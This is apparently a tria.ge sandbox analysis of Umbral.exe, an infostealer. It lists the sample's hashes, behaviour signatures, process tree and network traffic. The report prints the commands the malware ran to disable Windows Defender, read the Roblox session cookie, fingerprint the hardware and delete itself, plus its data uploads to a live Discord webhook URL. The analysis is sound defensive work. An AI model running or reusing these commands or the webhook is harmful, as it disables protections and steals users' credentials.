Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    138s
  • max time network
    107s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/05/2024, 12:00 UTC

General

  • Target

    Umbral.exe

  • Size

    232KB

  • MD5

    afbe250f9d941daf1fc895e29d0b2821

  • SHA1

    9aeaa55efa56702a0c2694ff2de3a5c6df7b03ac

  • SHA256

    628d7cd6016b226c4e5e5252b29dc89e42d30ffebfb489e36857079aad591ce6

  • SHA512

    177ddc51032af306d32c0826efddfa3be5e68621b440be764fba7ad37fd982fb58d7e902e4eb258fe50bbd236f82457e45e7d12a885c78314b304e72fb0f2c94

  • SSDEEP

    6144:tloZMDXU9Zx0kt8X0/PSCsMpwpf3tW+x5R0STTKN0b8e1mKISi:voZnf0kkPQwpf3tW+x5R0STTKm2

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3492
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1164
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Views/modifies file attributes
      PID:1496
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4400
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:452
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3324
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3016
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4476
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:64
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:1580
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4972
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:5020
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4948
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • Runs ping.exe
            PID:2012

      Network

      • flag-us
        DNS
        gstatic.com
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        gstatic.com
        IN A
        Response
        gstatic.com
        IN A
        216.58.201.99
      • flag-gb
        GET
        https://gstatic.com/generate_204
        Umbral.exe
        Remote address:
        216.58.201.99:443
        Request
        GET /generate_204 HTTP/1.1
        Host: gstatic.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 204 No Content
        Content-Length: 0
        Cross-Origin-Resource-Policy: cross-origin
        Date: Mon, 06 May 2024 12:00:51 GMT
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      • flag-us
        DNS
        ip-api.com
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        ip-api.com
        IN A
        Response
        ip-api.com
        IN A
        208.95.112.1
      • flag-us
        GET
        http://ip-api.com/line/?fields=hosting
        Umbral.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /line/?fields=hosting HTTP/1.1
        Host: ip-api.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Mon, 06 May 2024 12:00:51 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 6
        Access-Control-Allow-Origin: *
        X-Ttl: 60
        X-Rl: 44
      • flag-us
        DNS
        99.201.58.216.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        99.201.58.216.in-addr.arpa
        IN PTR
        Response
        99.201.58.216.in-addr.arpa
        IN PTR
        prg03s02-in-f31e100net
        99.201.58.216.in-addr.arpa
        IN PTR
        lhr48s48-in-f3�G
        99.201.58.216.in-addr.arpa
        IN PTR
        prg03s02-in-f99�G
      • flag-us
        DNS
        133.211.185.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        133.211.185.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        172.210.232.199.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        172.210.232.199.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        1.112.95.208.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        1.112.95.208.in-addr.arpa
        IN PTR
        Response
        1.112.95.208.in-addr.arpa
        IN PTR
        ip-apicom
      • flag-us
        DNS
        138.32.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        138.32.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        GET
        http://ip-api.com/json/?fields=225545
        Umbral.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=225545 HTTP/1.1
        Host: ip-api.com
        Response
        HTTP/1.1 200 OK
        Date: Mon, 06 May 2024 12:00:54 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 163
        Access-Control-Allow-Origin: *
        X-Ttl: 57
        X-Rl: 43
      • flag-us
        DNS
        canary.discord.com
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        canary.discord.com
        IN A
        Response
        canary.discord.com
        IN A
        162.159.128.233
        canary.discord.com
        IN A
        162.159.136.232
        canary.discord.com
        IN A
        162.159.135.232
        canary.discord.com
        IN A
        162.159.138.232
        canary.discord.com
        IN A
        162.159.137.232
      • flag-us
        POST
        https://canary.discord.com/api/webhooks/1236998752988823573/NsiSmSiQW8IAMjpG8SIg_6Zkfz_FbtFHloBWpL6PbxmkMA2TAyh0tCrgXWEmC3ZyASfA
        Umbral.exe
        Remote address:
        162.159.128.233:443
        Request
        POST /api/webhooks/1236998752988823573/NsiSmSiQW8IAMjpG8SIg_6Zkfz_FbtFHloBWpL6PbxmkMA2TAyh0tCrgXWEmC3ZyASfA HTTP/1.1
        Accept: application/json
        User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
        Content-Type: application/json; charset=utf-8
        Host: canary.discord.com
        Content-Length: 941
        Expect: 100-continue
        Connection: Keep-Alive
        Response
        HTTP/1.1 204 No Content
        Date: Mon, 06 May 2024 12:00:56 GMT
        Content-Type: text/html; charset=utf-8
        Connection: keep-alive
        CF-Ray: 87f8d00ead3d88bb-LHR
        CF-Cache-Status: DYNAMIC
        Set-Cookie: __dcfduid=4ba058740ba011ef9d186ec40f2130e5; Expires=Sat, 05-May-2029 12:00:56 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
        Via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        X-Content-Type-Options: nosniff
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1714996857
        x-ratelimit-reset-after: 1
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pk%2FS2p5tn%2FF87zx%2BV9gmk%2BSGNBU0o8zpBnEOct56eNO%2Fw8ahcC1eVI3BuGeWB4r%2Fp8UqOypt%2FJM%2FjJKrdJxmXPw%2FnPm82CN5gaxSRy5swksmMBFI3uWjeTyns5IQd2mAWxU3yQ%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
        Reporting-Endpoints: csp-sentry=https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
        Set-Cookie: __sdcfduid=4ba058740ba011ef9d186ec40f2130e53c3614cdcb08b5d0133770f5c7b1672dced72786eff77fbd3542596620d16159; Expires=Sat, 05-May-2029 12:00:56 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=40ae17675d8226e9b9291eb1a08f9dab86144f5f-1714996856; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=Nc4.ZoPnv_B9K2gAFD75SxW34SmQf4TWxAAMzdegfIM-1714996856373-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
      • flag-us
        POST
        https://canary.discord.com/api/webhooks/1236998752988823573/NsiSmSiQW8IAMjpG8SIg_6Zkfz_FbtFHloBWpL6PbxmkMA2TAyh0tCrgXWEmC3ZyASfA
        Umbral.exe
        Remote address:
        162.159.128.233:443
        Request
        POST /api/webhooks/1236998752988823573/NsiSmSiQW8IAMjpG8SIg_6Zkfz_FbtFHloBWpL6PbxmkMA2TAyh0tCrgXWEmC3ZyASfA HTTP/1.1
        Accept: application/json
        User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
        Content-Type: multipart/form-data; boundary="9406d979-65b4-4674-9755-d63ceaf801c3"
        Host: canary.discord.com
        Cookie: __dcfduid=4ba058740ba011ef9d186ec40f2130e5; __sdcfduid=4ba058740ba011ef9d186ec40f2130e53c3614cdcb08b5d0133770f5c7b1672dced72786eff77fbd3542596620d16159; __cfruid=40ae17675d8226e9b9291eb1a08f9dab86144f5f-1714996856; _cfuvid=Nc4.ZoPnv_B9K2gAFD75SxW34SmQf4TWxAAMzdegfIM-1714996856373-0.0.1.1-604800000
        Content-Length: 430209
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Mon, 06 May 2024 12:00:57 GMT
        Content-Type: application/json
        Transfer-Encoding: chunked
        Connection: keep-alive
        CF-Ray: 87f8d0107f8a88bb-LHR
        CF-Cache-Status: DYNAMIC
        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
        Vary: Accept-Encoding
        Via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        X-Content-Type-Options: nosniff
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1714996858
        x-ratelimit-reset-after: 1
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9v8vfMSpbmDDu7i494olgu20RW98ADwvTZsNv9zWq%2BsQ39N%2B8PwGTM5Ra4P2yUC3hznEtBgS3dq5hQv3WRIfNMkQ1mAhNxz1CTkAYXLvGk2cBiMYPWRImBTNIMBH%2FZhofZFfCw%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
        Reporting-Endpoints: csp-sentry=https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
        Server: cloudflare
      • flag-us
        DNS
        g.bing.com
        Remote address:
        8.8.8.8:53
        Request
        g.bing.com
        IN A
        Response
        g.bing.com
        IN CNAME
        g-bing-com.dual-a-0034.a-msedge.net
        g-bing-com.dual-a-0034.a-msedge.net
        IN CNAME
        dual-a-0034.a-msedge.net
        dual-a-0034.a-msedge.net
        IN A
        204.79.197.237
        dual-a-0034.a-msedge.net
        IN A
        13.107.21.237
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=2f52d203a3a54683af64022b209deb33&localId=w:514E7E71-4CE0-645C-5005-1E4EAC1BBA78&deviceId=6896200266421081&anid=
        Remote address:
        204.79.197.237:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=2f52d203a3a54683af64022b209deb33&localId=w:514E7E71-4CE0-645C-5005-1E4EAC1BBA78&deviceId=6896200266421081&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MUID=3D85EE45442C6F7C1368FA3245CC6EA4; domain=.bing.com; expires=Sat, 31-May-2025 12:00:56 GMT; path=/; SameSite=None; Secure; Priority=High;
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 3A59700B91F84BC5B2F2A6F8C6B83370 Ref B: LON04EDGE1213 Ref C: 2024-05-06T12:00:56Z
        date: Mon, 06 May 2024 12:00:55 GMT
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=2f52d203a3a54683af64022b209deb33&localId=w:514E7E71-4CE0-645C-5005-1E4EAC1BBA78&deviceId=6896200266421081&anid=
        Remote address:
        204.79.197.237:443
        Request
        GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=2f52d203a3a54683af64022b209deb33&localId=w:514E7E71-4CE0-645C-5005-1E4EAC1BBA78&deviceId=6896200266421081&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=3D85EE45442C6F7C1368FA3245CC6EA4
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MSPTC=BwQlhyPSdw-Ci2RVkaTg26BTeDQO-917m41t_PPloCc; domain=.bing.com; expires=Sat, 31-May-2025 12:00:56 GMT; path=/; Partitioned; secure; SameSite=None
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: DA85A351527A4AA5B864550860F91CF2 Ref B: LON04EDGE1213 Ref C: 2024-05-06T12:00:56Z
        date: Mon, 06 May 2024 12:00:55 GMT
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=2f52d203a3a54683af64022b209deb33&localId=w:514E7E71-4CE0-645C-5005-1E4EAC1BBA78&deviceId=6896200266421081&anid=
        Remote address:
        204.79.197.237:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=2f52d203a3a54683af64022b209deb33&localId=w:514E7E71-4CE0-645C-5005-1E4EAC1BBA78&deviceId=6896200266421081&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=3D85EE45442C6F7C1368FA3245CC6EA4; MSPTC=BwQlhyPSdw-Ci2RVkaTg26BTeDQO-917m41t_PPloCc
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: BAD6F676A4E7481382705515678A966D Ref B: LON04EDGE1213 Ref C: 2024-05-06T12:00:56Z
        date: Mon, 06 May 2024 12:00:55 GMT
      • flag-us
        DNS
        233.128.159.162.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        233.128.159.162.in-addr.arpa
        IN PTR
        Response
      • flag-nl
        GET
        https://www.bing.com/th?id=OADD2.10239355179391_1LFCMSFC5TYGHD1FP&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
        Remote address:
        23.62.61.155:443
        Request
        GET /th?id=OADD2.10239355179391_1LFCMSFC5TYGHD1FP&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
        host: www.bing.com
        accept: */*
        cookie: MUID=3D85EE45442C6F7C1368FA3245CC6EA4; MSPTC=BwQlhyPSdw-Ci2RVkaTg26BTeDQO-917m41t_PPloCc
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-type: image/png
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        content-length: 1463
        date: Mon, 06 May 2024 12:00:58 GMT
        alt-svc: h3=":443"; ma=93600
        x-cdn-traceid: 0.973d3e17.1714996858.280908ab
      • flag-us
        DNS
        237.197.79.204.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        237.197.79.204.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        155.61.62.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        155.61.62.23.in-addr.arpa
        IN PTR
        Response
        155.61.62.23.in-addr.arpa
        IN PTR
        a23-62-61-155deploystaticakamaitechnologiescom
      • flag-us
        DNS
        149.220.183.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        149.220.183.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        103.169.127.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        103.169.127.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        56.126.166.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        56.126.166.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        139.53.16.96.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        139.53.16.96.in-addr.arpa
        IN PTR
        Response
        139.53.16.96.in-addr.arpa
        IN PTR
        a96-16-53-139deploystaticakamaitechnologiescom
      • flag-us
        DNS
        79.190.18.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        79.190.18.2.in-addr.arpa
        IN PTR
        Response
        79.190.18.2.in-addr.arpa
        IN PTR
        a2-18-190-79deploystaticakamaitechnologiescom
      • flag-us
        DNS
        55.36.223.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        55.36.223.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        51.15.97.104.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        51.15.97.104.in-addr.arpa
        IN PTR
        Response
        51.15.97.104.in-addr.arpa
        IN PTR
        a104-97-15-51deploystaticakamaitechnologiescom
      • flag-us
        DNS
        29.243.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        29.243.111.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        tse1.mm.bing.net
        Remote address:
        8.8.8.8:53
        Request
        tse1.mm.bing.net
        IN A
        Response
        tse1.mm.bing.net
        IN CNAME
        mm-mm.bing.net.trafficmanager.net
        mm-mm.bing.net.trafficmanager.net
        IN CNAME
        dual-a-0001.a-msedge.net
        dual-a-0001.a-msedge.net
        IN A
        204.79.197.200
        dual-a-0001.a-msedge.net
        IN A
        13.107.21.200
      • flag-us
        GET
        https://tse1.mm.bing.net/th?id=OADD2.10239351692210_1AKNUXTAY2T0XUMCR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
        Remote address:
        204.79.197.200:443
        Request
        GET /th?id=OADD2.10239351692210_1AKNUXTAY2T0XUMCR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
        host: tse1.mm.bing.net
        accept: */*
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-length: 449656
        content-type: image/jpeg
        x-cache: TCP_HIT
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: D066B9301CFE460E936F969D280480FC Ref B: LON04EDGE0911 Ref C: 2024-05-06T12:02:36Z
        date: Mon, 06 May 2024 12:02:36 GMT
      • flag-us
        GET
        https://tse1.mm.bing.net/th?id=OADD2.10239351692215_1UJ4FAL91XLA7HB15&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
        Remote address:
        204.79.197.200:443
        Request
        GET /th?id=OADD2.10239351692215_1UJ4FAL91XLA7HB15&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
        host: tse1.mm.bing.net
        accept: */*
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-length: 468637
        content-type: image/jpeg
        x-cache: TCP_HIT
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 42E90FC722344C3F923E2D54A367FEB5 Ref B: LON04EDGE0911 Ref C: 2024-05-06T12:02:36Z
        date: Mon, 06 May 2024 12:02:36 GMT
      • 216.58.201.99:443
        https://gstatic.com/generate_204
        tls, http
        Umbral.exe
        770 B
        5.1kB
        9
        9

        HTTP Request

        GET https://gstatic.com/generate_204

        HTTP Response

        204
      • 208.95.112.1:80
        http://ip-api.com/line/?fields=hosting
        http
        Umbral.exe
        310 B
        267 B
        5
        2

        HTTP Request

        GET http://ip-api.com/line/?fields=hosting

        HTTP Response

        200
      • 208.95.112.1:80
        http://ip-api.com/json/?fields=225545
        http
        Umbral.exe
        285 B
        472 B
        5
        3

        HTTP Request

        GET http://ip-api.com/json/?fields=225545

        HTTP Response

        200
      • 162.159.128.233:443
        https://canary.discord.com/api/webhooks/1236998752988823573/NsiSmSiQW8IAMjpG8SIg_6Zkfz_FbtFHloBWpL6PbxmkMA2TAyh0tCrgXWEmC3ZyASfA
        tls, http
        Umbral.exe
        458.0kB
        13.2kB
        342
        145

        HTTP Request

        POST https://canary.discord.com/api/webhooks/1236998752988823573/NsiSmSiQW8IAMjpG8SIg_6Zkfz_FbtFHloBWpL6PbxmkMA2TAyh0tCrgXWEmC3ZyASfA

        HTTP Response

        204

        HTTP Request

        POST https://canary.discord.com/api/webhooks/1236998752988823573/NsiSmSiQW8IAMjpG8SIg_6Zkfz_FbtFHloBWpL6PbxmkMA2TAyh0tCrgXWEmC3ZyASfA

        HTTP Response

        200
      • 204.79.197.237:443
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=2f52d203a3a54683af64022b209deb33&localId=w:514E7E71-4CE0-645C-5005-1E4EAC1BBA78&deviceId=6896200266421081&anid=
        tls, http2
        2.0kB
        9.2kB
        22
        18

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=2f52d203a3a54683af64022b209deb33&localId=w:514E7E71-4CE0-645C-5005-1E4EAC1BBA78&deviceId=6896200266421081&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=2f52d203a3a54683af64022b209deb33&localId=w:514E7E71-4CE0-645C-5005-1E4EAC1BBA78&deviceId=6896200266421081&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=2f52d203a3a54683af64022b209deb33&localId=w:514E7E71-4CE0-645C-5005-1E4EAC1BBA78&deviceId=6896200266421081&anid=

        HTTP Response

        204
      • 23.62.61.155:443
        https://www.bing.com/th?id=OADD2.10239355179391_1LFCMSFC5TYGHD1FP&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
        tls, http2
        1.5kB
        6.8kB
        17
        13

        HTTP Request

        GET https://www.bing.com/th?id=OADD2.10239355179391_1LFCMSFC5TYGHD1FP&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

        HTTP Response

        200
      • 204.79.197.200:443
        tse1.mm.bing.net
        tls, http2
        1.3kB
        618 B
        12
        7
      • 204.79.197.200:443
        https://tse1.mm.bing.net/th?id=OADD2.10239351692215_1UJ4FAL91XLA7HB15&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
        tls, http2
        35.5kB
